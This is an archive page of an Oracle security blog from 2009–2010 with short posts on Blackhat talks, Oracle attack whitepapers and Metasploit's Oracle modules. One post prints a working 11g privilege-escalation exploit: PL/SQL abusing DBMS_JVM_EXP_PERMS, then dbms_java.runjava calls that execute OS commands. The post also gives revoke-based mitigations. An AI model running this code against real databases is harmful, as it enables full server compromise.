Sie befinden sich in den Archiven der Kategorie Exploit.
| M | D | M | D | F | S | S |
|---|---|---|---|---|---|---|
| « Aug | ||||||
| 1 | 2 | 3 | 4 | 5 | ||
| 6 | 7 | 8 | 9 | 10 | 11 | 12 |
| 13 | 14 | 15 | 16 | 17 | 18 | 19 |
| 20 | 21 | 22 | 23 | 24 | 25 | 26 |
| 27 | 28 | 29 | 30 | |||
- 11g (11)
- Allgemein (29)
- David Litchfield (7)
- Exploit (21)
- Forensics (5)
- Oracle Security (95)
- passwords (8)
- Repscan (1)
- Security (21)
- Sentrigo (5)
- software (9)
- source code audit (5)
- SQL Injection (24)
- Tools (24)
- Trainings (2)
- Tutorial (2)
- 5 Aug 2010: Oracle Presentations from Blackhat 2010 Las Vegas are online
- 18 Apr 2010: Blackhat 2010 Presentation "Oracle, Interrupted: Stealing Sessions and Credentials" online
- 15 Apr 2010: New fast Oracle DES password cracker OPS_SSE2
- 14 Apr 2010: Oracle 11g R2 client trojan warning from Antivir
- 13 Apr 2010: Python Source for PLSQL Unwrapper posted
- 13 Apr 2010: Oracle CPU April 2010 is out
- 13 Apr 2010: Improve Oracle TDE with Intel AES-NI
- 12 Apr 2010: Man-in-the-Middle attacks at upcoming Black Hat Europe
- 9 Apr 2010: Oracle CPU April 2010 - Prerelease
- 8 Apr 2010: Cool Web Application Scanner: Netsparker Community Edition
Oracle Security
SQL Injection
- August 2010
- April 2010
- März 2010
- Februar 2010
- Januar 2010
- Dezember 2009
- November 2009
- Oktober 2009
- September 2009
- August 2009
- Juli 2009
- Mai 2009
- April 2009
- März 2009
- Februar 2009
- Januar 2009
- Dezember 2008
- November 2008
- Oktober 2008
- August 2008
- Juli 2008
- Mai 2008
- April 2008
- März 2008
- Februar 2008
- Januar 2008
- Dezember 2007
- November 2007
- Oktober 2007
- September 2007
- August 2007
- Juli 2007
- Juni 2007
- Mai 2007
Archiv der Kategorie Exploit
Blackhat 2010 Presentation “Oracle, Interrupted: Stealing Sessions and Credentials” online
18 Apr 2010 von Alexander Kornbrust.
The Blackhat Europe 2010 “Oracle, Interrupted: Stealing Sessions and Credentials” (presentation, whitepaper) of Steve Ocepek and Wendel G. Henrique are online. An interview with Steve about the talk can be found here.
As mentioned in a previous blog post this talk shows how to intercept unencrypted (=default) TNS connections and inject statements into a running session. Steve and Wendel will soon release 2 tools Vamp and thicknet.
I will try to present these tools at the DOAG Expertenseminar in Berlin.
A good summary of the talk can be found at Peter Van Eeckhoutten’s blog.
Geschrieben in Tools, Exploit, Oracle Security | Drucken | Keine Kommentare »
Really good whitepaper about “Hacking Oracle from the Web”
22 Feb 2010 von Alexander Kornbrust.
Sumit Siddarth (Sid) has just published a really good whitepaper about “Hacking Oracle from the Web“.This is the most comprehensive published collection of different techniques for attacking Oracle from the web. Sid spent a lot of time composing the different techniques mentioned in various presentations and whitepapers.
Sid describes various techniques like data extraction (inband techniques like union or error messages, out-of-band techniques like heavy queries, blind, …), privilege escalation (sys.kupp$proc, dbms_repcat_rpc and dbms_export_extension) and OS code execution.
Well done Sid.
Geschrieben in Exploit, SQL Injection, Security | Drucken | Keine Kommentare »
Oracle Blackhat video removed from Website
5 Feb 2010 von Alexander Kornbrust.
Blackhat removed the video from David Litchfield (containing the 0day exploit code for 11g) from their website. But it’s too late because the 0day code for 11g can be found in the meantime in many places.
The video was downloaded several times and it’s just a question of time until it re-appears…
BTW Oracle 10.2.0.4 with all security patches is vulnerable against this issue too. But the exploit must be modified a little bit.
Geschrieben in 11g, Exploit, David Litchfield, Allgemein | Drucken | 5 Kommentare »
Oracle 11g 0day exploit published
4 Feb 2010 von Alexander Kornbrust.
I just read on Sumit Siddarth’s (Sid) blog that the video recording from David Litchfield’s BH presentation is online.
David showed how to escalate Java privileges using DBMS_JVM_EXP_PERMS.
DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT ‘GRANT’,USER(), ‘SYS’,’java.io.FilePermission’,’<<ALL FILES>>‘,’execute’,’ENABLED’ from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/
After the Java privilege escalation it is possible to run OS commands using a simple SELECT statement:
select dbms_java.runjava(’oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst’)from dual;
For security reasons you should:
revoke execute on dbms_java from PUBLIC;
revoke execute on dbms_java_test from PUBLIC;
revoke execute on “oracle/aurora/util/Wrapper” from PUBLIC;
grant execute on sys.dbms_jvm_exp_perms to IMP_FULL_DATABASE;
grant execute on sys.dbms_jvm_exp_perms to EXP_FULL_DATABASE;
revoke execute on sys.dbms_jvm_exp_perms from PUBLIC;
I just tested the code on my Linux 11.2.0.1 database and it worked without any problem.
SELECT * from dual where chr(42)=DBMS_JAVA.RUNJAVA(’oracle/aurora/util/Wrapper /bin/touch /tmp/iwashere3′);
Geschrieben in Exploit, David Litchfield | Drucken | 3 Kommentare »
Metasploit 3.3 is out
17 Nov 2009 von Alexander Kornbrust.
Metasploit 3.3, the leading exploit framework is out. Here an extract from the Metasploit blog:
“Oracle exploit support has been implemented through a tag-team effort between MC and Chris Gates, with assistance from Alexander Kornbrust. Oracle modules have been developed for exploiting TNS protocol stack and Web-based Oracle services, as well as post-authentication database-level privilege escalation flaws. ”
Version 3.3. (release notes) is the largest known ruby application (375,000 lines of code) and comes with some new Oracle features
- Support for the Oracle InstantClient Ruby driver as an exploit mixin
- Extensive support for exploitation and post-exploitation tasks against Oracle databases
Have fun using Metasploit.
Geschrieben in Tools, Exploit, Oracle Security, Allgemein | Drucken | Keine Kommentare »
